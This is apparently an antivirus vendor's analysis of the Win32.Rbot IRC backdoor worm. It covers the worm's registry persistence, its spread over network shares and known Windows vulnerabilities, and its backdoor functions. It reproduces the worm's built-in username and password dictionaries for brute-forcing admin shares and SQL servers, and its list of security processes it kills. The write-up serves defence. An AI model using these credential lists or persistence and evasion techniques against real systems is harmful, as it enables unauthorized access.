Description
Win32.Rbot is an IRC controlled backdoor (or "bot") that can be used to gain unauthorized access to a victim's machine. It can also exhibit worm-like functionality by exploiting weak passwords on administrative shares and by exploiting many different software vulnerabilities, as well as backdoors created by other malware. There are many variants of Rbot, and more are discovered regularly. Rbot is highly configurable, and is being very actively developed, however the core functionality is quite consistent between variants.
Most instances of Rbot are compressed and/or encrypted with one or more run-time executable packers. Examples include Morphine, UPX, ASPack, PESpin, EZIP, PEShield, PECompact, FSG, EXEStealth, PEX, MoleBox and PEtite.
Back to top
Method of Infection
When first run, Rbot will copy itself into the %System% directory. The file name is configured seperately for each variant, but a common example is "wuamgrd.exe". The worm may also be configured to use a different, randomly generated file name each time it installs itself. It sets the read only, hidden and system attributes for the file in the %System% directory, and sets its date/time to match that of the system file "explorer.exe".
The worm most commonly adds entries to the following registry keys so that it is automatically run each time Windows starts:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices
The value name is also configurable, therefore it can be different for each variant. For example:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft Update Machine = "wuamgrd.exe"
The worm may be configured to regularly check these values and re-set them if necessary.
Rbot will usually create a mutex to ensure only one copy runs at a time. The mutex name changes from one variant to the next. One observed example is "rxlsass01b".
Back to top
Method of Distribution
Win32.Rbot variants are able to spread in a number of different ways. Propagation is launched manually through backdoor control, rather than happening automatically. Not all variants support all propagation mechanisms.
Each spreading method begins with scanning for target machines. The worm can generate random values for all or part of each IP address it targets. Each attack vector is associated with a particular TCP port.
Via Network Shares (TCP ports 139 and 445)
Rbot can infect remote machines through Windows file sharing. It scans for target machines by probing TCP ports 139 and 445. If it can connect to either of these ports, it then tries to connect to the Windows share:
\\<target>\ipc$
Where <target> is the name of the machine it is trying to infect.
If this connection is not successful, it gives up on this machine. If the connection succeeds, it then attempts to retrieve a list of user names on the target, then use these user names to gain access to the system. If it cannot retrieve the list of user names, it falls back on a default list that it carries within itself, for example:
administrator
administrador
administrateur
administrat
admins
admin
staff
root
computer
owner
student
teacher
wwwadmin
guest
default
database
dba
oracle
db2
Note: Rbot may also try to access a remote machine using the credentials of the local account from which it is executed.
For each user name, it attempts to authenticate using several passwords stored within the worm. The password list can vary. For example:
007
1
12
123
1234
12345
123456
1234567
12345678
123456789
1234567890
2000
2001
2002
2003
2004
access
accounting
accounts
adm
admin
administrador
administrat
administrateur
administrator
admins
asd
backup
bill
bitch
blank
bob
bob
brian
changeme
chris
cisco
compaq
control
data
database
databasepass
databasepassword
db1
db1234
db2
dbpass
dbpassword
default
dell
demo
domain
domainpass
domainpassword
eric
exchange
fred
fuck
george
god
guest
hell
hello
home
homeuser
hp
ian
ibm
internet
internet |
intranet
jen
joe
john
kate
katie
lan
lee
linux
login
loginpass
luke
mail
main
mary
mike
neil
nokia
none
null
oainstall
oem
oeminstall
oemuser
office
oracle
orainstall
outlook
pass
pass1234
passwd
password
password1
peter
peter
pwd
qaz
qwe
qwerty
root
sa
sam
server
sex
siemens
slut
sql
sqlpass
staff
student
sue
susan
system
teacher
technical
test
unix
user
web
win2000
win2k
win98
windows
winnt
winpass
winxp
www
xp
zxc |
The list usually includes an empty password.
Assuming the worm can authenticate with the target machine, it then tries to copy itself to these locations:
\\<target>\Admin$\system32
\\<target>\c$\winnt\system32
\\<target>\c$\windows\system32
\\<target>\c
\\<target>\d
It then schedules a remote job to run the worm copy on the target machine.
Via Exploits
Win32.Rbot can also spread by exploiting vulnerabilities in Windows operating systems and third party applications. If it successfully exploits one of these, it executes a small amount of code on the target machine, which instructs it to connect back to the source in order to retrieve the complete worm executable. These connections back to the source use either the TFTP or HTTP protocol; the worm acts as a TFTP or HTTP server to deliver itself. The ports used for these servers are also configurable, but are often 81 for HTTP and 69 for TFTP.
This is a list of known vulnerabilities that Rbot may exploit:
1. Microsoft Windows LSASS buffer overflow vulnerability (TCP port 445)
http://www3.ca.com/threatinfo/vulninfo/vuln.aspx?id=27886
http://www.microsoft.com/technet/security/bulletin/MS04-011.mspx
2. Microsoft Windows ntdll.dll buffer overflow vulnerability (WebDav vulnerability) (TCP port 80)
http://www3.ca.com/threatinfo/vulninfo/vuln.aspx?ID=7287
http://www.microsoft.com/technet/security/bulletin/MS03-007.mspx
3. Microsoft Windows RPC malformed message buffer overflow vulnerability (TCP ports 135, 445, 1025)
http://www3.ca.com/threatinfo/vulninfo/vuln.aspx?ID=25454
http://www.microsoft.com/technet/security/bulletin/MS03-039.mspx (supersedes original bulletin MS03-026)
4. Microsoft Windows RPCSS malformed DCOM message buffer overflow vulnerabilities (TCP port 135)
http://www3.ca.com/threatinfo/vulninfo/vuln.aspx?ID=25975
http://www.microsoft.com/technet/security/bulletin/MS03-039.mspx
5. Exploiting weak passwords on MS SQL servers, including the Microsoft SQL Server Desktop Engine blank 'sa' password vulnerability (TCP port 1433)
http://www3.ca.com/threatinfo/vulninfo/vuln.aspx?ID=5705
http://support.microsoft.com/default.aspx?scid=kb;en-us;Q321081
Note: The worm tries the same password list as that used for spreading through shares, including a blank password. The SQL server accounts it attempts to log in to are "sa", "root" and "admin".
6. Microsoft Universal Plug and Play (UPnP) NOTIFY directive buffer overflow and DoS vulnerabilities (TCP port 5000)
http://www3.ca.com/threatinfo/vulninfo/vuln.aspx?ID=4520
http://www.microsoft.com/technet/security/bulletin/ms01-059.mspx
7. DameWare Mini Remote Control Buffer Overflow (TCP port 6129)
http://www3.ca.com/threatinfo/vulninfo/vuln.aspx?ID=26843
http://www.dameware.com/support/security/bulletin.asp?ID=SB2
8. Microsoft Windows Workstation service malformed message buffer overflow vulnerability (TCP port 445).
http://www3.ca.com/threatinfo/vulninfo/vuln.aspx?ID=26580
9. Microsoft Windows WINS replication packet memory overwrite vulnerability (TCP port 42)
http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?ID=31982
http://www.microsoft.com/technet/security/Bulletin/MS04-045.mspx
10. RealSystem Server SETUP buffer overflow vulnerability
http://www3.ca.com/securityadvisor/vulninfo/Vuln.aspx?ID=7168
11. Microsoft SQL Server 2000 Resolution Service buffer overflow vulnerability
http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?ID=6251
http://www.microsoft.com/technet/security/bulletin/ms02-061.mspx
12. Microsoft Windows Plug and Play service buffer overflow vulnerability
http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=33250
http://www.microsoft.com/technet/security/Bulletin/MS05-039.mspx
Via Other Malware
Some Rbot variants can also infect remote systems through backdoors created by other malware:
Note: some of the above trojans listen on variable ports. Known variants of Win32.Rbot use only the default ports as listed above.
Back to top
Payload
Backdoor Functionality
Rbot's main function is to act as an IRC controlled backdoor. It attempts to connect to a predefined IRC server and join a specific channel so that the victim's computer can be controlled. The IRC server, port number, channel and password differ with each variant.
Rbot also listens on TCP port 113 to provide ident services, which are required by some IRC servers.
Once the victim's computer is under control, the overseer is able to instruct Win32.Rbot to attempt to perform malicious operations such as spreading via administrative shares with weak passwords or the DCOM RPC exploit. The backdoor can also be instructed to:
- download and execute files from the Internet
- retrieve system information such as Operating System details
- retrieve CD keys for certain computer games, if present
- start a SOCKS proxy
- perform denial of service (DoS) attacks
- start several other servers: rlogin, http, tftp. The ports used for these are configurable.
- log keystrokes
- capture video from a webcam, if present
- send e-mail
Process Termination
Win32.Rbot can also be configured to terminate certain processes. These processes are usually related to anti-virus and other security software, but also include processes used by other malware. For example:
regedit.exe
msconfig.exe
netstat.exe
msblast.exe
zapro.exe
navw32.exe
navapw32.exe
zonealarm.exe
wincfg32.exe
taskmon.exe
PandaAVEngine.exe
sysinfo.exe
mscvb32.exe
MSBLAST.exe
teekids.exe
Penis32.exe
bbeagle.exe
SysMonXP.exe
winupd.exe
winsys.exe
ssate.exe
rate.exe
d3dupdate.exe
irun4.exe
i11r54n4.exe
Analysis by Hamish O'Dea
Back to top